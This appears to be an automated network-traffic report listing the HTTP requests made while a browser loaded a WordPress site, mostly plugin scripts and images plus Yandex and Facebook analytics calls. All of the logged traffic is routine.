        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fannavirgili.com%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22131%22%2C%22Chromium%22%3Bv%3D%22131%22%2C%22Not_A%20Brand%22%3Bv%3D%2224%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A131.0.6778.109%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22131.0.6778.109%22%2C%22Chromium%22%3Bv%3D%22131.0.6778.109%22%2C%22Not_A%20Brand%22%3Bv%3D%2224.0.0.0%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A15.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1541%3Acn%3A1%3Adp%3A0%3Als%3A248137426931%3Ahid%3A282929742%3Az%3A-300%3Ai%3A20241212065836%3Aet%3A1734004717%3Ac%3A1%3Arn%3A299573137%3Arqn%3A1%3Au%3A1734004717472745876%3Aw%3A1263x889%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A19099%3Awv%3A2%3Ads%3A630%2C1783%2C494%2C664%2C31%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1734004675978%3Agi%3AR0ExLjEuNTI4NjM2NDI5LjE3MzQwMDQ3MDc%3D%3Arqnl%3A1%3Ast%3A1734004718%3At%3AAnna%20Virgili&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29fid%28660%29ti%281%29&redirnss=1 HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: yabs-sid=2043977101734004721; i=DnO4vSXY7NC5aA9uCWPCXb+3uOHNUPOegqIRuxaN7LAmti6Y4x+s3UJPHUCWWCCGWI6PwwsT/I/iRfw1mx3Ax/YfF/k=; yandexuid=7280385001734004721; yuidss=7280385001734004721; ymex=1765540721.yrts.1734004721#1765540721.yrtsi.1734004721; bh=Ej8iR29vZ2xlIENocm9tZSI7dj0iMTMxIiwiQ2hyb21pdW0iO3Y9IjEzMSIsIk5vdF9BIEJyYW5kIjt2PSIyNCIaBSJ4ODYiIhAiMTMxLjAuNjc3OC4xMDkiKgI/MDoJIldpbmRvd3MiQggiMTUuMC4wIkoEIjY0IlJcIkdvb2dsZSBDaHJvbWUiO3Y9IjEzMS4wLjY3NzguMTA5IiwiQ2hyb21pdW0iO3Y9IjEzMS4wLjY3NzguMTA5IiwiTm90X0EgQnJhbmQiO3Y9IjI0LjAuMC4wIiI=
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js?ver=1.13.7 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-util.min.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min.js?ver=1.8.9.5 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-1@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=3.6.4 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/js/flags.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/js/base.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-util.min.js?ver=6.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/underscore.min.js?ver=1.13.7 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min.js?ver=1.8.9.5 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /signals/config/157851312877398?v=2.9.178&r=stable&domain=annavirgili.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-5@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-7@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-1@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/en.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; 